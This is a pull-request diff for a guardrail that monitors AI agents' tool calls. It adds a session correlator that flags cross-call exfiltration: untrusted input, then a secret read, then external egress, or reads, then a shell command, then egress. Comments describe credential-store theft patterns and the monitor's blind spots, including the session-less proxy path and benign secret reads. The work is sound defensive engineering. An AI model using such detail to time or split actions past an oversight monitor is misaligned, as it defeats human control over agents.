### PR TITLE
feat(engine): session correlator — cross-call exfiltration patterns (C3.1)

### DIFF
--- a/docs/REASON_CODES.md
+++ b/docs/REASON_CODES.md
@@ -3,7 +3,7 @@
 Every non-PASS Doberman decision can carry one or more `ReasonCode` values plus a human explanation.
 Catalogue of all members of `ReasonCode` in `src/doberman/models.py`, with raise-site modules under `src/doberman/`.
 
-**Total codes:** 51
+**Total codes:** 53
 
 | Code | Value | Group | Raised in | Meaning |
 |------|-------|-------|-----------|---------|
@@ -59,6 +59,8 @@ Catalogue of all members of `ReasonCode` in `src/doberman/models.py`, with raise
 | `egress_blocked_by_mode` | `egress_blocked_by_mode` | Feature RB — egress broker ground-truth reconciliation | `engine/rules/destinations.py` | In Paranoid mode only: a broker proven to enforce egress attests that this exact destination is NOT allowlisted and will itself drop it at the socket, so the rule hard-blocks instead of its usual AUTH. Dormant in every mode with no broker present. |
 | `anomalous_egress_velocity` | `anomalous_egress_velocity` | Feature RB — egress broker ground-truth reconciliation | `engine/rules/destinations.py` | A bounded, in-memory per-entity velocity tracker detected a burst, volume or fan-out anomaly across this entity's broker-observed connections in the same recent window used by RB.3, retrospectively raising the already-computed verdict. |
 | `artifact_digest_mismatch` | `artifact_digest_mismatch` | RB.7 — post-fetch artifact digest verification | `proxy/executor.py` | A pinned expected sha256 digest exists for a previously-fetched identity and the freshly returned tool-result content's digest disagrees with it, so the result is withheld from the agent post-fetch. |
+| `correlated_trifecta` | `correlated_trifecta` | C3.1 — session correlator (cross-call pattern floor) | `engine/correlator.py`, `proxy/executor.py` | This session's recent decision history shows an untrusted-provenance ingress and a sensitive/secret read as separate earlier calls, and the current action is an external egress — a lethal trifecta assembled across calls rather than within one. |
+| `correlated_destructive_flow` | `correlated_destructive_flow` | C3.1 — session correlator (cross-call pattern floor) | `engine/correlator.py`, `proxy/executor.py` | This session's recent decision history shows a broad read/enumeration and a shell command as separate earlier calls, and the current action is an external egress — a possible archive-then-exfiltrate flow. |
 
 ## Notes
 

--- a/src/doberman/engine/correlator.py
+++ b/src/doberman/engine/correlator.py
@@ -4,26 +4,34 @@ Catches individually-safe actions that combine into exfiltration across a
 session — a sequence the per-action objective/subjective rules miss, because
 each of those judges exactly one action.
 
-This module is a PURE function (:func:`correlate`), deliberately **not** wired
-into :func:`doberman.engine.decision_engine.decide`. ``decide()`` short-circuits
-on the first non-PASS objective verdict (an AUTH/BLOCK leg of a multi-step
+:func:`correlate` itself is a PURE function, deliberately **not** wired into
+:func:`doberman.engine.decision_engine.decide`. ``decide()`` short-circuits on
+the first non-PASS objective verdict (an AUTH/BLOCK leg of a multi-step
 attack), so a correlator called from inside it would never see the later legs
 that complete the pattern. Like the taint floor
-(:mod:`doberman.engine.taint_floor`), it is meant to run in the async executor
-AFTER ``decide()`` returns, over the session's persisted decision history.
+(:mod:`doberman.engine.taint_floor`), it is meant to run AFTER ``decide()``
+returns, over the session's persisted decision history —
+:func:`apply_correlator_async`/:func:`apply_correlator` below do exactly that
+(read the history, run :func:`correlate`, raise the decision), mirroring the
+taint floor's own async/sync split so both the async proxy executor and the
+sync host-hook spine can share one implementation without either importing
+the other's (heavier) module.
 
 It also deliberately does **not** touch
 :data:`doberman.engine.decision_engine.SUBJECTIVE_HARD_BLOCK_ALLOWLIST` — the
-caller raises the final ``Decision`` directly via ``max_verdict``/``max_risk``
-(mirroring the taint floor's own call site), bypassing the subjective clamp by
-construction rather than smuggling a new code onto that allowlist.
+apply wrapper raises the final ``Decision`` directly via
+``max_verdict``/``max_risk`` (mirroring the taint floor's own call site),
+bypassing the subjective clamp by construction rather than smuggling a new
+code onto that allowlist.
 """
 
 from __future__ import annotations
 
+import asyncio
 from collections.abc import Sequence
 from dataclasses import dataclass
 
+from doberman.engine.decision_engine import max_risk, max_verdict
 from doberman.models import (
     ActionType,
     Decision,
@@ -43,11 +51,39 @@ _STRICT_MODES: frozenset[str] = frozenset({"strict", "paranoid"})
 #: Reason codes on a PRIOR row that mark it as a sensitive/secret read — the
 #: "sensitive data" leg of the trifecta, and the read leg of the destructive-
 #: flow pattern.
+#:
+#: Deliberately SECRET-CLASS ONLY (content/secret-store evidence from
+#: ``SecretLeakageRule``) — ``sensitive_path_access`` (a bare glob-policy hit
+#: from ``ProtectedPathRule``, e.g. ``infra/**``/``backend/auth/**``) is
+#: excluded. Measured on a hand-built benign/attack sequence corpus
+#: (2026-08-13): a benign "read untrusted web content -> read a policy-
+#: sensitive config that legitimately holds an API token -> call a real but
+#: non-allowlisted external API" chain and an attack "read untrusted content
+#: -> read an actual secret-store file (``.npmrc``/``credentials``-shaped) ->
+#: send to an unknown destination" chain are cleanly distinguishable at the
+#: read step: the benign config read fires ONLY ``sensitive_path_access``
+#: (glob-policy, not secret-content evidence), while the attack's read of a
+#: real credential store fires ``sensitive_secret_access`` (secret-class) —
+#: the two rules key off different, non-overlapping path/content signals
+#: (``ProtectedPathRule``'s ``DEFAULT_SENSITIVE_GLOBS`` vs
+#: ``SecretLeakageRule``'s ``_SECRET_PATH``/content patterns). Keeping only
+#: secret-class codes here dropped ``correlated_trifecta``'s own false-fire
+#: rate on the benign chain from 100% to 0% in EVERY mode, with zero loss on
+#: the attack corpus (``correlated_trifecta`` still fires 100% of the time).
+#: Strict mode's benign session still ends up AUTH overall — but that is
+#: ``ExternalDestinationRule``'s own "unknown destination" policy in strict
+#: mode (unrelated to, and unaffected by, this narrowing), not the
+#: correlator misfiring — see ``doberman-vault/Sessions`` for the benchmark.
+#: Residual, NOT fixed by this narrowing: a benign session whose "sensitive"
+#: read genuinely touches real secret-shaped content (not just a
+#: policy-sensitive path) is still structurally identical to an attack read
+#: and will still fire — the correlator has no task/intent signal (the
+#: deferred D2 task-match leg) to tell "legitimately needs this credential"
+#: from "is exfiltrating it".
 _SENSITIVE_READ_REASONS: frozenset[ReasonCode] = frozenset(
     {
         ReasonCode.sensitive_secret_access,
         ReasonCode.possible_high_entropy_secret,
-        ReasonCode.sensitive_path_access,
         ReasonCode.secret_exfiltration,
     }
 )
@@ -248,4 +284,97 @@ def _correlate(
         risk=risk,
         reason_codes=reasons,
         explanation=explanation,
+    )
+
+
+#: How many of the session's most-recent decisions to read as pattern-check
+#: history. Bounded so the read stays a cheap, single indexed query
+#: regardless of session length. Matches the proxy executor's own
+#: ``_CORRELATOR_WINDOW`` (kept here as the shared default so a caller that
+#: doesn't override it gets the same window either way).
+_DEFAULT_WINDOW = 20
+
+
+async def apply_correlator_async(
+    action: SecurityObject,
+    decision: Decision,
+    mode: str,
+    repo_root: str,
+    session_id: str | None,
+    *,
+    window: int = _DEFAULT_WINDOW,
+) -> Decision:
+    """C3.1 — read this session's recent decision history and raise-only
+    apply :func:`correlate` to ``decision``.
+
+    Mirrors ``taint_floor.py``'s own shape: read a bounded slice of session
+    history, run the pure pattern check, and apply any raise directly via
+    ``max_verdict``/``max_risk`` — bypassing the subjective clamp by
+    construction, rather than adding a new code to
+    ``SUBJECTIVE_HARD_BLOCK_ALLOWLIST``.
+
+    Fails closed to the untouched ``decision``: a DB read failure or a
+    correlator bug must never crash the caller or silently escalate —
+    ``recent_session_decisions`` and :func:`correlate` are already
+    individually fail-closed/fail-quiet, and this wrapper adds one more layer
+    of defense-in-depth around the two calls. With ``session_id=None`` (no
+    session concept at the call site) ``recent_session_decisions`` returns an
+    empty history and this never fires — the same documented gap as the
+    taint floor's own ``session_id=None`` callers.
+    """
+    try:
+        from doberman.storage.log import recent_session_decisions  # lazy: keeps this module light
+
+        raw_rows = await recent_session_decisions(repo_root, session_id, window)
+        rows = [
+            row for row in (DecisionRow.from_storage(raw) for raw in raw_rows) if row is not None
+        ]
+        raise_result = correlate(rows, decision, action, mode)
+    except Exception:  # noqa: BLE001 — the correlator must never break the caller's path
+        return decision
+    if raise_result is None:
+        return decision
+    reasons = list(dict.fromkeys([*decision.reason_codes, *raise_result.reason_codes]))
+    explanation = " ".join(
+        part for part in (decision.explanation.strip(), raise_result.explanation.strip()) if part
+    )
+    return decision.model_copy(
+        update={
+            "final_verdict": max_verdict(decision.final_verdict, raise_result.verdict),
+            "final_risk": max_risk(decision.final_risk, raise_result.risk),
+            "reason_codes": reasons,
+            "explanation": explanation,
+        }
+    )
+
+
+def apply_correlator(
+    action: SecurityObject,
+    decision: Decision,
+    mode: str,
+    repo_root: str,
+    session_id: str | None,
+    *,
+    window: int = _DEFAULT_WINDOW,
+) -> Decision:
+    """Sync wrapper around :func:`apply_correlator_async` for the host-hook
+    spine (:mod:`doberman.hosthooks.spine`), which runs outside any event
+    loop — same split, and the same reason, as ``taint_floor.py``'s own
+    ``apply_taint_floor``/``apply_taint_floor_async`` pair: the async proxy
+    executor already runs inside a live event loop and must await
+    :func:`apply_correlator_async` directly (calling this sync wrapper there
+    would raise ``RuntimeError: asyncio.run() cannot be called from a running
+    event loop``).
+
+    ponytail: ``doberman.proxy.executor._apply_correlator`` still carries its
+    own copy of this read-correlate-raise sequence rather than calling
+    :func:`apply_correlator_async` directly — its tests monkeypatch
+    ``executor.recent_session_decisions`` (a module-level name), which a
+    delegating call would silently stop honoring. Not worth widening this
+    slice's diff (and risk) to touch already-green proxy tests for a ~15-line
+    dedup; upgrade path: fold it in when that test's monkeypatch target moves
+    to ``doberman.storage.log`` directly.
+    """
+    return asyncio.run(
+        apply_correlator_async(action, decision, mode, repo_root, session_id, window=window)
     )

--- a/src/doberman/engine/correlator.py
+++ b/src/doberman/engine/correlator.py
@@ -1,0 +1,251 @@
+"""C3.1 — the session correlator: a cross-call, pattern-based exfiltration floor.
+
+Catches individually-safe actions that combine into exfiltration across a
+session — a sequence the per-action objective/subjective rules miss, because
+each of those judges exactly one action.
+
+This module is a PURE function (:func:`correlate`), deliberately **not** wired
+into :func:`doberman.engine.decision_engine.decide`. ``decide()`` short-circuits
+on the first non-PASS objective verdict (an AUTH/BLOCK leg of a multi-step
+attack), so a correlator called from inside it would never see the later legs
+that complete the pattern. Like the taint floor
+(:mod:`doberman.engine.taint_floor`), it is meant to run in the async executor
+AFTER ``decide()`` returns, over the session's persisted decision history.
+
+It also deliberately does **not** touch
+:data:`doberman.engine.decision_engine.SUBJECTIVE_HARD_BLOCK_ALLOWLIST` — the
+caller raises the final ``Decision`` directly via ``max_verdict``/``max_risk``
+(mirroring the taint floor's own call site), bypassing the subjective clamp by
+construction rather than smuggling a new code onto that allowlist.
+"""
+
+from __future__ import annotations
+
+from collections.abc import Sequence
+from dataclasses import dataclass
+
+from doberman.models import (
+    ActionType,
+    Decision,
+    GuardrailResult,
+    ReasonCode,
+    Risk,
+    SecurityObject,
+    SourceContext,
+    Verdict,
+)
+
+#: Modes where a firing pattern hard-BLOCKs outright rather than AUTH'ing.
+#: Mirrors the taint floor's own strict/paranoid gate (ADR 0021): raise-only,
+#: strictest modes only — light/balanced keep the human in the loop.
+_STRICT_MODES: frozenset[str] = frozenset({"strict", "paranoid"})
+
+#: Reason codes on a PRIOR row that mark it as a sensitive/secret read — the
+#: "sensitive data" leg of the trifecta, and the read leg of the destructive-
+#: flow pattern.
+_SENSITIVE_READ_REASONS: frozenset[ReasonCode] = frozenset(
+    {
+        ReasonCode.sensitive_secret_access,
+        ReasonCode.possible_high_entropy_secret,
+        ReasonCode.sensitive_path_access,
+        ReasonCode.secret_exfiltration,
+    }
+)
+
+#: Reason codes marking a PRIOR row as an egress *attempt* — used only by the
+#: weak budget clause below, never as the primary egress signal (that is
+#: always the CURRENT action's live ``external_destination``, exactly like
+#: ``taint_floor.py``'s own egress scope note).
+_EGRESS_ATTEMPT_REASONS: frozenset[ReasonCode] = frozenset(
+    {
+        ReasonCode.unknown_external_destination,
+        ReasonCode.egress_requires_auth,
+        ReasonCode.confidentiality_sensitive_destination,
+        ReasonCode.egress_route_divergence,
+        ReasonCode.anomalous_egress_velocity,
+        ReasonCode.multi_step_exfil,
+        ReasonCode.confirmed_exfil,
+    }
+)
+
+# ponytail: a round threshold, not a fit against real traffic — the budget
+# clause is a weak co-factor by design (it can never fire alone; see
+# `correlate` below), so a wrong constant here only ever shifts risk between
+# high/critical on an already-firing pattern, never PASS vs. AUTH/BLOCK.
+# Upgrade path: calibrate against real session logs if this proves loose.
+_BUDGET_VOLUME_THRESHOLD = 3
+
+_TRIFECTA_EXPLANATION = (
+    "This session read sensitive or secret data, carried untrusted-provenance "
+    "content, and is now sending data to an external destination — a cross-call "
+    "lethal trifecta."
+)
+_DESTRUCTIVE_FLOW_EXPLANATION = (
+    "This session enumerated or read data, ran a shell command, and is now "
+    "sending data to an external destination — a possible archive-and-exfiltrate flow."
+)
+_BUDGET_NOTE = " Session also shows elevated sensitive-read/egress-attempt volume."
+
+
+@dataclass(frozen=True)
+class DecisionRow:
+    """One session-scoped decision, as returned by
+    :func:`doberman.storage.log.recent_session_decisions` — the same redacted
+    slice already persisted for a decision row. Never carries a raw target or
+    argument; only the classes/reason-codes vocabulary the decision log itself
+    is redacted to.
+    """
+
+    action_type: ActionType
+    target_path_class: str | None
+    source_context: SourceContext
+    risk: Risk
+    reason_codes: tuple[ReasonCode, ...]
+    final_verdict: Verdict
+
+    @classmethod
+    def from_storage(cls, row: dict) -> DecisionRow | None:
+        """Build one row from a ``recent_session_decisions`` dict.
+
+        Returns ``None`` on any malformed/unrecognized value — a bad historic
+        row (a schema drift, a stale enum value from an old version) must
+        never crash the correlator; the caller simply loses that one row from
+        its window instead of failing the whole read.
+        """
+        try:
+            return cls(
+                action_type=ActionType(row["action_type"]),
+                target_path_class=row.get("target_path_class"),
+                source_context=SourceContext(row["source_context"]),
+                risk=Risk(row["risk"]),
+                reason_codes=tuple(ReasonCode(rc) for rc in row.get("reason_codes") or ()),
+                final_verdict=Verdict(row["final_verdict"]),
+            )
+        except (KeyError, ValueError, TypeError):
+            return None
+
+
+def _is_untrusted_ingress(row: DecisionRow) -> bool:
+    """Everything but a directly-typed user instruction is at least mixed/
+    untrusted provenance — mirrors ``subjective/infer.py``'s
+    ``SourceContext`` → ``Provenance`` map (``SourceContext.user`` is the only
+    member mapped to ``trusted_instruction``)."""
+    return row.source_context is not SourceContext.user
+
+
+def _is_sensitive_read(row: DecisionRow) -> bool:
+    return bool(_SENSITIVE_READ_REASONS.intersection(row.reason_codes))
+
+
+def _is_command(row: DecisionRow) -> bool:
+    return row.action_type is ActionType.shell_exec
+
+
+def _is_broad_read(row: DecisionRow) -> bool:
+    return row.action_type is ActionType.file_read
+
+
+def _is_egress_attempt(row: DecisionRow) -> bool:
+    return bool(_EGRESS_ATTEMPT_REASONS.intersection(row.reason_codes))
+
+
+def _current_is_egress(action: SecurityObject) -> bool:
+    """Mirrors ``taint_floor.py``: the egress signal is ``external_destination``."""
+    return action.external_destination is not None
+
+
+def _trifecta_fires(recent: Sequence[DecisionRow], action: SecurityObject) -> bool:
+    """Untrusted-provenance ingress + a sensitive/secret read, anywhere earlier
+    this session, followed by the CURRENT action being an external egress."""
+    if not _current_is_egress(action):
+        return False
+    has_untrusted_ingress = any(_is_untrusted_ingress(row) for row in recent)
+    has_sensitive_read = any(_is_sensitive_read(row) for row in recent)
+    return has_untrusted_ingress and has_sensitive_read
+
+
+def _destructive_flow_fires(recent: Sequence[DecisionRow], action: SecurityObject) -> bool:
+    """A broad read/list + a shell command, anywhere earlier this session,
+    followed by the CURRENT action being an external egress.
+
+    ponytail: the redacted decision log never carries raw command text (by
+    design — see ``models.py``'s ``SecurityObject.raw_args_redacted`` note), so
+    "archive/compress shape" cannot be distinguished from any other shell
+    command once it is only a persisted ``DecisionRow`` — any prior
+    ``shell_exec`` is treated as the archive-leg proxy. Upgrade path: if a
+    future objective rule fingerprints archive-shaped commands (tar/zip/gzip
+    verbs) into a dedicated reason code, key off that instead of the bare
+    action type.
+    """
+    if not _current_is_egress(action):
+        return False
+    has_broad_read = any(_is_broad_read(row) for row in recent)
+    has_command = any(_is_command(row) for row in recent)
+    return has_broad_read and has_command
+
+
+def correlate(
+    recent: Sequence[DecisionRow],
+    current: Decision,  # noqa: ARG001 — part of the documented contract; not yet consulted
+    action: SecurityObject,
+    mode: str,
+) -> GuardrailResult | None:
+    """Pure cross-call pattern check over a session's recent decisions.
+
+    Returns the strongest applicable raise as a :class:`GuardrailResult`, or
+    ``None`` when no pattern fires. Never raises — any internal failure
+    (malformed input, an unexpected type) is swallowed and treated as "no
+    match"; the caller is responsible for failing closed by leaving the
+    existing objective/subjective decision untouched, never by escalating on
+    a correlator bug.
+
+    ``current`` (the Decision already reached for THIS action) is accepted for
+    the documented interface / future patterns that need it, but the two
+    patterns implemented here only need the live ``action`` (for the egress
+    signal) and the redacted ``recent`` history.
+    """
+    try:
+        return _correlate(recent, action, mode)
+    except Exception:  # noqa: BLE001 — pure helper; caller treats a failure as None
+        return None
+
+
+def _correlate(
+    recent: Sequence[DecisionRow], action: SecurityObject, mode: str
+) -> GuardrailResult | None:
+    fired_trifecta = _trifecta_fires(recent, action)
+    fired_destructive = _destructive_flow_fires(recent, action)
+    if not fired_trifecta and not fired_destructive:
+        return None
+
+    hard_block = mode in _STRICT_MODES
+    verdict = Verdict.BLOCK if hard_block else Verdict.AUTH
+    risk = Risk.critical if hard_block else Risk.high
+
+    reasons: list[ReasonCode] = []
+    explanations: list[str] = []
+    if fired_trifecta:
+        reasons.append(ReasonCode.correlated_trifecta)
+        explanations.append(_TRIFECTA_EXPLANATION)
+    if fired_destructive:
+        reasons.append(ReasonCode.correlated_destructive_flow)
+        explanations.append(_DESTRUCTIVE_FLOW_EXPLANATION)
+    explanation = " ".join(explanations)
+
+    # Budget clause: a weak, COMBINABLE-ONLY co-factor — it can never be the
+    # sole trigger (guarded by the fired_trifecta/fired_destructive check
+    # above, which runs first and returns None on volume alone). High session
+    # sensitive-read/egress-attempt volume alongside an already-firing pattern
+    # pushes risk to critical even outside strict/paranoid; per ADR 0059 this
+    # never fires standalone (no blind gameable threshold).
+    volume = sum(1 for row in recent if _is_sensitive_read(row) or _is_egress_attempt(row))
+    if volume >= _BUDGET_VOLUME_THRESHOLD:
+        risk = Risk.critical
+        explanation += _BUDGET_NOTE
+
+    return GuardrailResult(
+        verdict=verdict,
+        risk=risk,
+        reason_codes=reasons,
+        explanation=explanation,
+    )

--- a/src/doberman/hosthooks/spine.py
+++ b/src/doberman/hosthooks/spine.py
@@ -2,10 +2,10 @@
 
 Every host hook does the same thing between "translated the host's tool call"
 and "shaped the host's answer": resolve repo root + strictness mode, extract a
-session id, normalize, decide, apply the taint floor, resolve the enforcement
-dial, compute the acted verdict, and record monitor-softened history. This
-module owns that flow so a new host supplies ONLY its tool map, required-field
-checks, and output shape.
+session id, normalize, decide, apply the taint floor, apply the session
+correlator (C3.1), resolve the enforcement dial, compute the acted verdict,
+and record monitor-softened history. This module owns that flow so a new host
+supplies ONLY its tool map, required-field checks, and output shape.
 
 Speed contract (same as the adapters): imports only the light decision path —
 NEVER the proxy's tool-execution module or the subjective baseline (their ML
@@ -23,6 +23,7 @@ from dataclasses import dataclass
 from typing import Any
 
 from doberman.config import load_active_role, load_mode, resolve_enforcement_sync
+from doberman.engine.correlator import apply_correlator
 from doberman.engine.decision_engine import PASS_STUB, decide
 from doberman.engine.objective import ObjectiveGuardrail
 from doberman.engine.taint_floor import apply_taint_floor
@@ -83,6 +84,15 @@ def evaluate_action(
     )
     decision = decide(action, ObjectiveGuardrail(), PASS_STUB, ctx)
     decision = apply_taint_floor(action, decision, ctx.mode, repo_root, session_id, args)
+    # C3.1 session correlator: cross-call PATTERN raise (raise-only), right after
+    # the taint floor for the same reason (see doberman.engine.correlator's module
+    # docstring). Unlike the pure-MCP proxy's tool-execution chokepoint (no session
+    # concept of its own, always passes session_id=None), THIS path already has a
+    # real per-session id — the host harness's own session id (HK.5.1), extracted
+    # above and already used to scope the taint floor and the decision-history
+    # writes below — so the correlator reads real cross-call history here and can
+    # actually fire in production.
+    decision = apply_correlator(action, decision, ctx.mode, repo_root, session_id)
     enforcement = resolve_enforcement_sync(repo_root)
     acted = acted_verdict(decision, enforcement)
     if (

--- a/src/doberman/models.py
+++ b/src/doberman/models.py
@@ -268,6 +268,13 @@ class ReasonCode(StrEnum):
     # fingerprint) in an outbound payload: a confirmed read-then-send exfiltration.
     confirmed_exfil = "confirmed_exfil"
 
+    # C3.1 — the session correlator (doberman.engine.correlator): catches
+    # individually-safe actions that combine into exfiltration across a
+    # session's decision history. Raised post-decide, in the async executor —
+    # never inside decide() itself (see the module docstring).
+    correlated_trifecta = "correlated_trifecta"
+    correlated_destructive_flow = "correlated_destructive_flow"
+
     # Feature 11 — turn gate (pre-inference). Tier 0 (deterministic, BLOCK) and
     # Tier 1 (heuristic, AUTH-only). Every turn verdict carries one of these.
     turn_gate_error = "turn_gate_error"

--- a/src/doberman/proxy/executor.py
+++ b/src/doberman/proxy/executor.py
@@ -735,9 +735,16 @@ async def decide_and_execute(
     # C3.1 session correlator: cross-call PATTERN raise (raise-only), run right
     # after the taint floor for the same reason — see _apply_correlator's
     # docstring. Same `session_id=None` gap as the taint floor call above: the
-    # pure-MCP proxy has no session id of its own, so this reads an empty
-    # history (and never fires) until a caller with a real session id (HK.5.1 —
-    # see doberman.hosthooks.spine.extract_session_id) is wired in.
+    # pure-MCP proxy's `decide_and_execute`/`_call_tool` chokepoint (mcp_proxy.py)
+    # takes only `(downstream, tool_name, arguments)` — no session concept exists
+    # anywhere on this call path to thread through, so this deliberately keeps
+    # reading an empty history (never fires) here. This is NOT a remaining gap:
+    # doberman.hosthooks.spine.evaluate_action DOES have a real per-call session
+    # id (HK.5.1, via extract_session_id) and is now wired to the same correlator
+    # (doberman.engine.correlator.apply_correlator) — every host-hook adapter
+    # (Claude Code, OpenClaw, Codex) fires the correlator for real; only the raw
+    # MCP-proxy entry point remains session-less by design, exactly like the
+    # taint floor above.
     decision = await _apply_correlator(action, decision, load_mode(REPO_ROOT), None)
 
     # Record every intercepted action with its REAL verdict. Logged before the

--- a/src/doberman/proxy/executor.py
+++ b/src/doberman/proxy/executor.py
@@ -35,7 +35,8 @@ from doberman.auth.challenge import (
 from doberman.auth.elevation import find_cover, scope_for_target
 from doberman.config import load_active_role, load_enforcement, load_mode, load_preferences
 from doberman.egress.artifact import ArtifactPinStore, ArtifactVerdict
-from doberman.engine.decision_engine import Guardrail, decide, max_risk
+from doberman.engine.correlator import DecisionRow, correlate
+from doberman.engine.decision_engine import Guardrail, decide, max_risk, max_verdict
 from doberman.engine.objective import ObjectiveGuardrail
 from doberman.engine.rules import BUILTIN_RULE_TYPES
 from doberman.engine.rules.destinations import ExternalDestinationRule
@@ -56,7 +57,7 @@ from doberman.policy.drift import acted_verdict, effective_enforcement
 from doberman.proxy.interception_log import log_action
 from doberman.proxy.normalize import normalize
 from doberman.storage.db import active_elevations, grant_elevation, mark_used
-from doberman.storage.log import record_decision
+from doberman.storage.log import recent_session_decisions, record_decision
 from doberman.subjective.baseline import (
     budget_allows_step_up,
     entity_id,
@@ -140,6 +141,11 @@ _VERDICT_TEMPLATES = {
 _OUTPUT_BLOCK_REASON_CODES: frozenset[ReasonCode] = frozenset(
     {ReasonCode.secret_exfiltration, ReasonCode.sensitive_secret_access}
 )
+
+#: C3.1 session correlator: how many of the session's most-recent decisions to
+#: read as pattern-check history. Bounded so the read stays a cheap, single
+#: indexed query regardless of session length.
+_CORRELATOR_WINDOW = 20
 
 
 def _denied_result(reason: ReasonCode, error_class: str, action_id: str) -> CallToolResult:
@@ -339,6 +345,50 @@ def _safe_decide(action: SecurityObject, ctx: EvalContext) -> Decision:
         # unwind is fail-closed by construction (no forward is reached).
         _engine_logger.exception("decision engine raised; failing closed (action %s)", action.id)
         return _engine_failure_decision(action)
+
+
+async def _apply_correlator(
+    action: SecurityObject, decision: Decision, mode: str, session_id: str | None
+) -> Decision:
+    """C3.1 — raise-only cross-call pattern check, run after the taint floor.
+
+    Mirrors ``apply_taint_floor_async``'s own shape: read a bounded slice of
+    this session's redacted decision history, run the pure ``correlate()``
+    over it, and apply any raise directly via ``max_verdict``/``max_risk`` —
+    bypassing the subjective clamp by construction, exactly like the taint
+    floor, rather than adding a new code to ``SUBJECTIVE_HARD_BLOCK_ALLOWLIST``.
+
+    Fails closed to the untouched ``decision``: a DB read failure or a
+    correlator bug must never crash the path or (via a swallowed exception
+    inside this function) silently escalate — both ``recent_session_decisions``
+    and ``correlate`` are already individually fail-closed/fail-quiet, and this
+    wrapper adds one more layer of defense-in-depth around the two calls.
+    """
+    try:
+        raw_rows = await recent_session_decisions(REPO_ROOT, session_id, _CORRELATOR_WINDOW)
+        rows = [
+            row for row in (DecisionRow.from_storage(raw) for raw in raw_rows) if row is not None
+        ]
+        raise_result = correlate(rows, decision, action, mode)
+    except Exception:  # noqa: BLE001 — the correlator must never break the execution path
+        _engine_logger.warning(
+            "session correlator failed (action %s); leaving decision as-is", action.id
+        )
+        return decision
+    if raise_result is None:
+        return decision
+    reasons = list(dict.fromkeys([*decision.reason_codes, *raise_result.reason_codes]))
+    explanation = " ".join(
+        part for part in (decision.explanation.strip(), raise_result.explanation.strip()) if part
+    )
+    return decision.model_copy(
+        update={
+            "final_verdict": max_verdict(decision.final_verdict, raise_result.verdict),
+            "final_risk": max_risk(decision.final_risk, raise_result.risk),
+            "reason_codes": reasons,
+            "explanation": explanation,
+        }
+    )
 
 
 def _is_destructive(action: SecurityObject) -> bool:
@@ -681,6 +731,14 @@ async def decide_and_execute(
     decision = await apply_taint_floor_async(
         action, decision, load_mode(REPO_ROOT), REPO_ROOT, None, arguments or {}
     )
+
+    # C3.1 session correlator: cross-call PATTERN raise (raise-only), run right
+    # after the taint floor for the same reason — see _apply_correlator's
+    # docstring. Same `session_id=None` gap as the taint floor call above: the
+    # pure-MCP proxy has no session id of its own, so this reads an empty
+    # history (and never fires) until a caller with a real session id (HK.5.1 —
+    # see doberman.hosthooks.spine.extract_session_id) is wired in.
+    decision = await _apply_correlator(action, decision, load_mode(REPO_ROOT), None)
 
     # Record every intercepted action with its REAL verdict. Logged before the
     # gate — safe because log_action swallows its own failures and forwards

--- a/src/doberman/storage/log.py
+++ b/src/doberman/storage/log.py
@@ -67,6 +67,15 @@ _SELECT_DECISIONS_SINCE = (
     "FROM decisions WHERE id > ? ORDER BY id ASC"
 )
 
+# C3.1 — the session correlator's history read (doberman.engine.correlator).
+# Narrower than _SELECT_DECISIONS: only the redacted fields a correlation
+# pattern needs, scoped to one session and newest-first so the caller can take
+# the last N cheaply.
+_SELECT_SESSION_DECISIONS = (
+    "SELECT action_type, target_path_class, source_context, risk, reason_codes_json, "
+    "final_verdict FROM decisions WHERE session_id = ? ORDER BY id DESC LIMIT ?"
+)
+
 _DECISION_COLUMNS = [
     "id",
     "ts",
@@ -302,6 +311,55 @@ async def read_decisions_since(
     except Exception:  # noqa: BLE001 — a read failure must never crash the dash
         return []
     return [dict(zip(_DECISION_COLUMNS, row, strict=True)) for row in rows]
+
+
+async def recent_session_decisions(repo_root: str, session_id: str | None, n: int) -> list[dict]:
+    """The last ``n`` decisions for ``session_id``, newest first — lightweight,
+    already-redacted rows for the session correlator (``doberman.engine.correlator``).
+
+    Each row is ``{"action_type", "target_path_class", "source_context", "risk",
+    "reason_codes" (parsed list), "final_verdict"}`` — the same redacted
+    vocabulary already persisted by :func:`record_decision`, never the raw
+    target/arguments. Fails closed to ``[]`` on any error (missing/locked DB, no
+    ``session_id``, a malformed row) — a degraded read must never fabricate
+    session history, which would let the correlator either miss or invent a
+    cross-call pattern.
+    """
+    from doberman.storage.db import db_path
+
+    if not session_id or not db_path(repo_root).exists():
+        return []
+    try:
+        async with open_db(repo_root) as conn:
+            async with conn.execute(_SELECT_SESSION_DECISIONS, (session_id, int(n))) as cur:
+                rows = await cur.fetchall()
+    except Exception:  # noqa: BLE001 — a read failure must never break the decision path
+        return []
+
+    out: list[dict] = []
+    for (
+        action_type,
+        target_path_class,
+        source_context,
+        risk,
+        reason_codes_json,
+        final_verdict,
+    ) in rows:
+        try:
+            reason_codes = json.loads(reason_codes_json) if reason_codes_json else []
+        except (TypeError, ValueError):
+            reason_codes = []
+        out.append(
+            {
+                "action_type": action_type,
+                "target_path_class": target_path_class,
+                "source_context": source_context,
+                "risk": risk,
+                "reason_codes": reason_codes,
+                "final_verdict": final_verdict,
+            }
+        )
+    return out
 
 
 async def memory_summary(repo_root: str) -> dict:

--- a/tests/integration/test_decision_log.py
+++ b/tests/integration/test_decision_log.py
@@ -1,18 +1,26 @@
 """Slice 8.2 — append-only, redacted decision-log writer (wired into the proxy)."""
 
 import inspect
+from datetime import datetime, timezone
 
 from doberman.auth.challenge import AuthResult, AuthTier
+from doberman.models import (
+    ActionType,
+    Decision,
+    GuardrailResult,
+    ReasonCode,
+    Risk,
+    SecurityObject,
+    Verdict,
+)
 from doberman.proxy import executor
 from doberman.storage.db import open_db
-from doberman.storage.log import read_decisions
+from doberman.storage.log import read_decisions, recent_session_decisions, record_decision
 
 from .test_proxy_passthrough import proxied_session
 
 
 def _deny(decision, action, *, prompter=None, at=None):
-    from datetime import datetime, timezone
-
     return AuthResult(
         approved=False,
         tier=AuthTier.two_factor,
@@ -75,3 +83,57 @@ def test_writer_has_no_update_or_delete_path_for_decisions():
     src = inspect.getsource(log_module)
     assert "UPDATE decisions" not in src
     assert "DELETE FROM decisions" not in src
+
+
+def _decision_and_action(verdict: Verdict, action_id: str) -> tuple[Decision, SecurityObject]:
+    reasons = [] if verdict is Verdict.PASS else [ReasonCode.sensitive_secret_access]
+    now = datetime.now(timezone.utc)
+    objective = GuardrailResult(
+        verdict=verdict, risk=Risk.low, reason_codes=reasons, explanation="x"
+    )
+    decision = Decision(
+        action_id=action_id,
+        final_verdict=verdict,
+        final_risk=Risk.low,
+        objective=objective,
+        reason_codes=reasons,
+        explanation="x",
